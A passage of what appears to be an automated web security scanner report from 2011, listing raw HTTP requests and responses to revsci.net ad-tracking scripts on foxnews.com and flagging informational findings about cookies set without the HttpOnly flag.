Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_segs_1000000=pUPF50mBb3IQT7uItGE2X50BYAxW06NpBWaN1BBor9n5r3cWnhlMz8N5SuHqPlIcMc/C4eouzQqRGvUTwEbYBkMK6+l/eeYNv3TEMfSdmp2gfzq3cXK7asnl7Okw1iO1r3Zji9TbEzy0Zro3lIfsJnCOs8vMC7FGijy9NIwp1QEIIFa6/KACjO84wPjH17rb9s+SB1aK8QWu2nPDzJ7oMUvDvwbRy2Uknd6fDJWmG4kc2Q7MzQQam7koP9wCEzgtBC+3GY6mbtxeLD2bJKOoM2Uz/lx1QucniVrDkJREi5MwlUjXOUr6haymrfxjTlUNxU5xuDkdlNFS; rtc_frfn=MLsv8aVKMT5j5rKp+0udG4F6UFF3mCjA+4IAGF2JTcWQu4ojfJTgzUfD1AFIKRl+6nouXCvtEI0ktcbhLVg+ShYcIKaJGvMXsOsTQflE/DzTiDy7TuqWIEjLa/MU4QlGQCooF9mpQ0tJeQ2VDQwT+Cv3zxPCjbH8ojnofsnT8+1IiwJeeTN8Wvr2f2KW4oMLsaueiZcsAtpXRlxjmoE/Vll/GgaY0bZ+0ACIDElyqNdcOXzliGL+KtYu7cICVVaq7B0LYVSwEe0nhieZZtCJhAicP0IofjtcFE9P5/t9T1g87x1gpLbviJRWv8wvVvA2ibNvJZ+yrf1tfjCuq7RHnBQXRelMm2eh6qSZ2mggvcm42oTWOpH54IrMlBijTUDgPJRD4gL4DWXALiiGTIdG5auV9k3zqdnOmd/2I/Dna+VD25YyKAKp1/1qKfwVIBIMA01mcQQ5ekv2pdanfe6np+wbiIbASU7ajZK2vRYNaul2JT+zMHtCCRUMp230aVKd5j1i/2lRjn7sEeL2EKmfL4pYBaPl1Q==; rsi_us_1000000=pUP1JU+j/wMc1i3EK6nRWJnT0DSpp0yJ1LIjTHoNZF3ns4O8Qk944S2en4T0xjKlYqoSa5TaguMdsKLmT07NXiO17lvmwD7C0rmmRFPeJxXiTezu+04jKq2gV7BF9vKn/G6U/GLXP8RwhGWkGecP4PArNYJ0irJtCzAJf1g0czOgAEeACoTj50UADx+0bsfEZMFHwq/X7azaLG9Wa0cTDdNRzTQPUzFg6+30LyvaPRUcxd0kiE201M9xPwklUuJ7IUIZc5pJRKJYTvbQCYlsa8wVSLn2UdYlu6lKeJ+tImCNhwh5rLw4ALwh4DrVxNeWGWxdiJ0QU2kCww2rCsena/OctLd77bZZqTmEb9nJNR/uQ3WP/VgQ4GlDgWLxaOMCepiqikop7PXzdmsBBv+SKnU5/l+uLEP1X5q8pK/C2nF8w6d/vqht85fjugxcBeHbxDvAlprUVyMh/WjpmFW+deBVUw6LT4aoooiNjtJcUYjprtNw0hj5eAYFrAqgcYq34PLJYccqxKE5/10D2yeMMLo3f9RKPl9fXpF+3V8ndHQWCF81KNo2QnK+MSHtegiLtRKV/5PVOdiTC0fHsjbDs5Gi6wA0rG2XGajTCdiSBtKExMsHh8YqOOSQnaYq8q/13JlmpxObz3CsL8NEJzM3JlgmlkapIvmOUbz3aQ72+KbI1cqnHVZToNz7Nr2H9ksWJ7uo/CmNCCJ0pO5tO6ep1zOTTPA=; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEbZaaSamC1ltg80jsQpPrRW9xUPO7gbf50ex879sHUlxsDSMSyT40d3i3oWLlLx3l4iXJ3lhmJmWMpXdFZio2NtzwdFhixjqa++pY03yPsYif+I22fJpxiCeXATY0TaMOLuuvmF9lS5clgGYKPXsAHk8G/+uaKobXLYtRca2cjf1wA0fVV3DUZ7Rqet6j8kaLJBtzgyaoCVLZswXfcQaV2Z2E1Y4+gfeXIWOfLAZo4VnyvkCJ7JrHFLmF227dJliBQ3PAsYsrICByEXJONNTCxFwjUZgMu1yrWXgBM61SXbM3H5HZMW6eagR8bMyi9ZyfzV3prMvQ7hXGHuCg6AAfXhLx3vX7XHEpPhd7ReO1857XiQvC11c3BSkgKQSgVRD2vI9chJiPTPkURf9whdpTesFFSNfn6poRHHFPoqWfDRVbCje+HKkXWEKcEwr7xgmRPQ+S0E6r4YYXep3vWeDASYs3TRli392OK7fMR5RriQJZeQbMzcP6pnNw78ETsCG02I/2kVgUDaQ2uTXF4qWauE9k+wdgKuGOMl/81r7MJloNin93A+BLqudwYghUUgURjufOoKLVR1dPhGmfE1ZDRS2JYXRDhPNB4JdeEYbrSHsiBYRSPuqSa1cv0TEYnscMlQ5LfAlKto/OrVND5IHXstCzlRQEFLliU6qegaJmMbrnSqzncLFjcif/ecvleE7vXSQd0c2jh6pAVBRgbPPf93WRtKS9vrPbhpe+GANBDY/WUoHwstk8Ck/CyQCSpfWWbSiekLmgfMkQm5rI0dJ6EiB657hvuMbQFeKkq79OMiOohuDkXt8fz4hk1O9bZketGuNeNcCoNZNYuQbkNTiu+5s5DCy61TDcQ6yN+liPyGAQjIJTt81xZ2QTRPTCL6kYD9dkwxGA4ScOcWcIieMDXVshpJCRyF2KBxFyX999f/cZzpyFqSo2c8IvkYf5IxIZZICpY1WkYr4JdQNbQFQ/LGQt3fk3bLUaUmWik7zCnotWG1FwVimJt4YvhwjbLFEFH8Yod+Yp4Vf1xVv7wyg0pheHAv4bmKG/QvdaI1m4lb9ixsbjlJBdyQ+XgJLJz9dwlD/MkA4Vjw/jIXQXzkn839hcG4XG/YAfnVxoIowfHYXL3CthIu2+sgB1KewjDOK/0zUWonO4Tp7ytKLF8/M2n5Vk5MWaOjBxpN0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_frfn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50mBb3IQT7uItGE2X50BIAFW06NpBWaN1BBor9n5r3cWnhlMz8N5SuHqPlIcMc/C4eouTVrAUuU0EZdEEApIej2Z9I5YDD5+tjUi+wHYpyJHIXS7asnl7Okw1iO1r3Zji9TbEzy05s/8t5gSc44NdsvMa9aWWe+BU45IJSyXhbUuSoLQjG2bWFW22HTm9/aAbkrnw2l/oCRjnJ6onUvDvwbbth8DlbcoJIGd7MaMuVvAZu8SiO9HvoFWdnF9f1a5JA3WOE19WnoWS7iJnEOd3W3Iokgo3jYZlUPhUKZEfp7XJwnVFuopD4zVEVbeNAGAqlG2jfVEag==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:01:14 GMT; Path=/
Set-Cookie: rtc_xis9=MLsv8VUusR9n5QgQh+2eD1ty26AgQ+XLMXEmNDUbK5xW2nYekizNLI+Ux4AdIJIvEz27RctNtu160CrFcHVQoKWkTuKSCpNTgbvpjz67BYju6GP6An+lbHIaUOtknXHGOAK+fZEml7dCRGXSwBpNVfDq/TXdwgK+JlBYZE67Zx+21M0S02XA7asVwUth1lXYNhAEExaYdZisiph5OSnf6VxvmIMSpXPp4T8KumNJqNdeCIzm9EL2KtYg7ZrfZFsbKtm17/2aOKtylcUAByZGCb5PqXiHqBrJpAY3WQch5WpGiEJL3KNQf2kiWheqMV/jIumc0t1Rj2vo0lAB0BDSHG45W9vquc56YmBh4OQsy3SW269zAR4Q0dNKS5dYFtvhn1zBUWXsHy7EfWKrrGhIAt2eI3LUEO3qr+WZzD1tst0HBkOfjr8xKHFpE56ynldIDD/7jtnpMaZ2kgW+3CXBMVZ5aj2WNJz757mLJ+9U4RjdHCbwcZxC8lFzlNF3k8pFAX0k3gxu/NOw1EZc3DLfc1eRsow=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:01:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:01:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.124. http://pix04.revsci.net/E05510/b3/0/3/1003161/79844803.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/79844803.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/79844803.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kmBbwIMpzaxU4PYtPOvfrkYE6TaYgYB7Vmortn5r3cWnkmNvYNLatz2X2BRF/fDQH3S4VmsJRmJAa6LzgIo+537rACtt4VO+PWokPmyIxbjaaHhz/vsx9a7RMLbY9q7jMUlAIBwk4sT4DdtcoBbI90YN1KKOEH7mTDHQq1ZYXL57PqG3vkOBz3IILtQ1leAc4QXC1zbD/weAMzTqo9/+qBzFfb4m1rB8+0tHZM9M9/fmzYu6tffcCI7HDpM1NDaAgYLiqWjjqFIrJT6lIvxMkzAaflItWN9Mak18nGnn7OgOGKwea2uZJTUH6/ST/cPfMLIAfJAdA4=; rtc_5CmO=MLsv8SVKcR5n5bLrq5gACIHaNi9NrDEErILtKT6KaMjh9FvAc/FYAEbD1AFIKRnVK8Nn0XgnoG4pxoPjUZVkiOaoo9MSkxfH8UtTjXb8JspCpaCBt+pXOUV+TqfJZVi7m6lzqvCfVC1N4cRJhKoNgcxZglSP2A+b4Z3nLGdE/q9Gp8/sA+3FxZYr2PuqFmHcWUZpNNKYgpEcdYJg268e6XxvmClfh5miu6Tr9CQ6ZOsRKvERBLkWPhhnB5Eg/I3ueNCqe7ZlY/FIejkmqyA5qs0rDMa6QuyedVUcyGn4YNedOOE42PwWnqTsWu/2AU/jgvSLM1RShGnwYhixAF3Y3G8TZ6fiDYOhuQPtQsLHL/EcuAf8MKQ/uDN+4AvnXLaglfPQjeP8QbfoZwGChOp5OFp/THda2UYpirwONMkGDD+oTfaBdgJXpGHsR/+TAnm4Bj/7gtvpcaY2ohWuGCTBMVZ5Ch2WNJz777mPJO9S4RjtFKZNQPpBe0NllM17Vwt9AY2k3kxsqAUWtn/3KrPfclNZsoY=; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000="pUP1JU2jPiIY1S1irdS/eyBPUbLvfmNCKg8xgSBi0BgiNk7ALFYTllyJQoRpwsGfAxYQZ0y79K1JysH2KDOZWhHXxCtT0v8AFPcOwp1PLPyVCBDPJP6yYaqUGzVjcpPXvJaX/GLUP9R3hEWkGecP4PArtYF0ilLtCDAJf1g0iyqgAEeDCoDv50UADx8kFaspqLcdN9OKyP9MsuPLlDUqAmSW5pL3U4FSPVzvqxqC2sWCNjbWTutciYJDmVYOyzBso8YG/LZsyIMUIbAv2qUD2GWmsohQBmPK7E71Xro0P2DdUU1tzL4YCDzSNOuuqTWVdiwXgUk9pTvnqVGIzPDCdAZ21akDLS+hiXQj7wVeczgvWJpfRtx9nf3jw3+/nrLMZ1i+r/Iu/yS5HNXNNTGaVmguT3mBOuAsOTrXj1VieQSSFbeqjD2Q5GuPUy+gZ8E7o/dUL84MnSNihNUHO2Zis01co39H+HgZYSYS8G4QSSIT627P753yPSxzH3seIM7/KE3HPWYcrstu7zFtyOA6djmB/DwTS4va7oV1zY/Im0qT1xuUZMJT1DzVP1jYM6FkxSpdJiRQb9VhUZRPCTCvBRGJ58VeOA9aJuhanJRzGQTNDG+u8RqMXyH3gnLgMOUm9vO9yUjhDrYYB85n8VnhbeN8Wu0X8rme3Wq8pEC9tAWe525tYX0R0P4GzRsx1uolWOuaNQf5Klq5yz4="; udm_0=MLvv9SUJaSpr557EdtIXqfE3HZxD2jF7YYAV7uTQoXkALe+h8IdgKDFp4QDAVAIGzRVDE7jI/n/4akBaNcbN8GRULj1YH2UvUjE0/EtDYBCOZ+dl9gvDLo0p8jG3XS5bUMUOKNqd3og7rMda8A1/+5chhVDerwuh30DL1Nhh9Cj6S6bFYRSzWtKl9j4Az1Kp6RjX1NX3KSCYg7f5SHnfw8MaqjRB4otkU3UfI5GKa8XWv1Uox8wfWv2fmL2KS+zxfiQJzSpfuVwz1OkuPUS5T9946ZcSoWZyYS9IZgJ9YEDTKIlt69XXZ+uaSYO6zeILc2Zb5RQOQzIeqUX/+TK1kJFPG4APKKhvO8hyamsmWNpWC8G6/Cw5wVl/oHs8LM78piMOgoMMVXcofoXKIfv4RQK6Ue02i4GEPFyemadMdZtXbwz260b423Rnn0H63PKgD1eLI3hpljO8FNkGwBNAzpUY+ay9lrb/lR3AhulkHXcy7Y/FllspQpWzVatzlk54T84xesdZ4NhUATCjJQZxYS6KzN64wa1scWCtu39zCB5+H2hUHA65Z+AGcy7AEbQIcV5XeGRGO9clTz6RqYJ17KLwC5NL3KBK71a1jpqThQYxi/ptTdR1yEHu/bFF9hVsI77B0aEm8uHbquXCt1fLsk029JkoeXaiKu0+7uvNiZk4Ykged+TurlcUR4YrfdHGzTuaBCRCl6T1LFK5c2CJrLAOA+SriPRZvrm1dHkoDgbG5T4zve3gsMA/997VEJesKSZXBrEoAkGjEeaiT5g1NjqKg58EbBz/DJq3LCmYc62rxpw/SRH9dmZJRhbz6rV9xuFz2y0NlqKbCpaUGxdnaODJ0OS1Nz9dJ4lH3IsTvVVjNEmD6tju4W8zuw8zi33ip+V+nIRrgcCQa3eHzRzQz6C6GYMXPV6LAqO3QYRvkEOYH9MAaQwSFgdKpZPJ8ur1P/4M8UOK4ugnGaN7Vt0qzXmZi3XVNUhwoK19k97iwbMeDNzCridVGAJ4iO6g810j7BFqk9xppdM4j1ZZjfcnrjswWFauD8iVAwTKwQiHyOgtjZcYP9tjmvroHYChj2JPEPqL9kSfT0UoHV+Vg7jVEPgsRb6/TrNLdI1z/1NUVgew5DMD7n4Bw+ScHJZyjaafwfooCMLTekVwZ0abKM6jTBVXlDZmiBPg7sX7WMWTiRVGjBpzL6PMag==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_5CmO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNES86Ed19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5jGOEYbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfxr/bSmHu66WBFOadqLveFcaF2EAO7AQ4cRuqi+BaUIdzLqQQszXr3k5ZhVUGFXGd5SgNnJE9T9e7e8Uk97qprVdkByxBWXOQNJvlFPjhoTvUl6coK4MNy0BJqXd42sTaKNaTEfN6olwN7hJg8nrp7Rm/aF6qO5XrtU2AO+oRQixl6R22HUp4O7SlAeYro/Ri/BD6yJlbqcBop9gygWStXoGp9EYw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:51:14 GMT; Path=/
Set-Cookie: rtc_I7t_=MLsv8aVKMT5j5rKp+0udG4F6UFF3mCjA+4IAGF2JTcWQu4ojfJTgzUfD1AFIKRl+6nouXCvtEI0ktcbhLVg+ShYcIKaJGvMXsOsTQflE/DzTiDy7TuqWIEjLa/MU4QlGQCooF9mpQ0tJeQ2VDQwT+Cv3zxPCjbH8ojnofsnT8+1IiwJeeTN8Wvr2f2KW4oMLsaueiZcsAtpXRlxjmoE/Vll/GgaY0bZ+0ACIDElyqNdcOXzliGL+KtYu7cICVVaq7B0LYVSwEe0nhieZZtCJhAicP0IofjtcFE9P5/t9T1g87x1gpLbviJRWv8wvVvA2ibNvJZ+yrf1tfjCuq7RHnBQXRelMm2eh6qSZ2mggvcm42oTWOpH54IrMlBijTUDgPJRD4gL4DWXALiiGTIdG5auV9k3zqdnOmd/2I/Dna+VD25YyKAKp1/1qKfwVIBIMA01mcQQ5ekv2pdanfe6np+wbiIbASU7ajZK2vRYNaul2JT+zMHtCCRUMp230aVKd5j1i/2lRjn7sEeL2EKmfL4pYBaPl1Q==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 16:51:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:51:13 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.125. http://pix04.revsci.net/E05510/b3/0/3/1003161/844383816.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/844383816.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/844383816.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UNESU50e19nKCDeVRxV0JGXV/y20UzrToS2ouxUK6pw26DrqGgVo5jGOEYbyX/hYsFy7h6ka2YtGHF7L0J0A7uDKsLBjQfyzmVKgBYCKKxTZuxZHFHYbHosr+2FiGJnoSu9TOv0Ed0bwHzoYlR5nQpDVycN0wf1gGfc1aLnqIutIcbCuLukCwLvansX84C75JXqHxK+ZkcdTMwYFZY3hIHudmPzpyCeSKo+8elpwJtHbrQXlnceLv9l9AfZIN+3WXAyns810GYaxcIC54TKzzwAL4CbduJcLn17Ni6mcBpy4PykrwNOYQ5xEZQ==; rtc_Eo2d=MLsv8aVKMT5j5oLEkrhIMohGIOhkT2KrqjTC5Waa85sd3XtYJlhOwG1tfjK7UWmvp+UXB+11jW4pxhvc9EIyKcbf18wDEpPP9J3s63g7N4gnniGrGmYG6i5VHFLqEP1X3/2H7VCrwcXndfedqtqR/qCtqPt+0Q+bTPdy7X8RiP+3VIJDEnzycFgtpSt4FyrYNpWdHZybWfgqNUd84d96t/tOdIoVUoeTNAh0V0yrFDcbJGVrs3NCoUKLL/us5jAPfUQKUkTrPComdnLK11baAPXRgDACqxX152M0Wx6tr6STLNH6Ipn2Za37FPk5D38UmNaFlaeYgvtCOiXAC0hdmtBShNPv+9selQXtPLMtpAvSGnOFdRE5UTzhoa6hsiZkjy3bfoCnFn6kAzCvN0CSBUVTjhduVFNSTojejG7zhUcxLLELAO0+zZWn9k4dxgIaRNpx7k+9tKld56fRWzzi5bDtT9uB3UxAlsyZIUHL2/UrZ4t7jsaW4bBuCK8PdFhIyid8JfdqWso1Sxro/9ulzTKEVwaw+ts=; rsi_us_1000000=pUP1JU2jPhIc1A0uGejL/IkyHP/iCy1YlHTtDOL8O4HVofQkYq4TJih0lxuQpcssPgTTO6N6cGG/v/3x265qQaEMDAY+dk6xoGMF736Z36xPuDqQN2kFYuGgViRdfhNQyV6kwFS8LEKGF1AlwCVvI3GaR/mPmmaZNLb2mc0jtqwCSlognlWmh7oLiO6Nl5gf7WxwKFG8J4px03dvVUGdK2CxNWDtUrGqyMo63/W6oHKpyFJv8tYSJWVc69DYDFXLIllYUaGnbOfwvWLRoBMiWHShooAzncA4eMP02fRj8WLtJScn7Tx5eOVxxabxnCYbxlpZmVMBNbrDnuaJBmOtX9zXmbuFl7k0imYebm/nefW6Jy5YZgrf7hGajtmyoJfeZhhJrQRGZFfLvSGyv3CbNQ91VEatgnZwCntqkD8M7uJW1/afUPY5rNJ31HXWmUv4l1+uATGRnIWV6FE22GKXegwZwAkJa0Lhxbl/t8l0NvYGYXic+4HGh+JhuZvj0LAW45KfWAQjpv+9yJRC3RwErx2XejmGAz/zOr+MPbjvNrhZIAmtp/dhQDM7yHKAP+uJM+uIODBbO9iTC0e/sjbDw6Gi6wA0pG1neX33OdiKDs12ogA+lAZyg4LV2ayrFMnIKT4hUzB3MZpPr140AevGziLRMpl3bme1q33wEvoJhvJk7uDC2BdBjFw5bdod8Cnzj8/WJbGu4kLeMP0fCtAq0+BNTEo=; udm_0=MLvv9SMJaSpn557EdtKGREzM5uAkEsBEcLqEBjKmOxigTwd3JroPKHhBEknhsvqTAE9Wvh6ZCxtEwuWCMc/HeFcDwqHXN49yYG00YWJzQGMfhXD6eaVK0BWAQCZrKOnsVHMSFFaI0oRfUo3CmZVJP+yyATY0TaMOLuuvmF9lS5clgGYKNXsAHk8G9+u6GoZXLYxSga2Yld1wA0fVVnDUZzRqCt6j8kaLJBtvgyaoCVLftAUfi6+EHEu8/bLemDWcmWWMhppjV9On6y5ycKMkyu7TNHsZ/x+EVnPg4AGIIGlzjUXAsQssKgvpNIGMFhrOFJCv8PUGJr6MGJ7BzEqNIGhbTjclQq+wCCcK6jECb4SCuT4iR7iM+YJHizNKGiFOHJdgrltp753l14/z5K85sfFYT/RXqPoKTZuXthKfS7+i8Fiq4YGrPvUscOA+TtC40T+GWXIbXLCDzQoIyX7gwToDwnOG1oB36zxVTZo86Tvg5PCMyjcoieBKpLbygxma8EKf5AGe5USis3KU7kueoE1DgJYPSQMErI78LK9QhIIcoZAmaCkiu6na81hz8iDIP6T3GL8EGebiKMsir6WZ1y48ARMVF2IiLgWii6FpKJLwI+uiD0fgAJjlGolCAE+XNypxUEbL2oYxRxQanLHB7DKCuq7XSTzrI72C4oL0VozaEk9xM5ZLeZOAfDoVgzc+Yped6+ccVtD3nY6iSzBIckXUi+Bu+dX7qwGlme9o4t0VNxEz4COrTyglhj6ajNOo+SCtqkJE4PZ9eSd/HVS74wesr0C4HH+YkpTEnE06uaLDxO3/lh7xv0CBBNrJoH5Yb1Z8dY8vUru1PpAD0cZJw6pdEs/JV7mx7kZmGFcUFxj6wVlmS9fRzY1WtoT10zaXnZGd29vHrjlS818OtO5YwMEFFdxqW/7e41ZIYi52KrWHbMABr2yllZKaFjg/3gMMRl+bF5czKi3c6823QxEobPMEtTpD56yOd9ZeMQcsKRydBKyXqr0JFfZRmzMITG669jRs9AKqgBQqitGojVbABfIFzpzNVP/lneMYL30A7Ts98bgNtHFtOrmj+lqMmwbar7SXeoCm8x0B2xV2Rs4/F5/O3kqUttd3LCqhmAyAp4+qEAfQCXRxuVO15gEajqaurRb0hqhynWo9YT2VY+l/H+ghMLM4ugrThIQVDwRXn6cePB6KyWDwpY1ZoD9mmGo2Royk

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Eo2d=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X50BYKwAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXCCrXdEH3+Olb6OSMFWO3iaX3U4x5KBzIAVnlhd1O0W2AYTCeO1WiZw6d1/bEfwpa9Jx+T0t2HymXAB5ZMZdvwCql4xopO4TGbW7nqCe6YKCE5Urm5Kq9x1S6UwczQ3lIQWdHhtc7QWf8fO2I4SxcCgnIC8RIqIJfAGhhifSnDNP9bucfEQyRHkdStXoA9JEZQ==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:21:16 GMT; Path=/
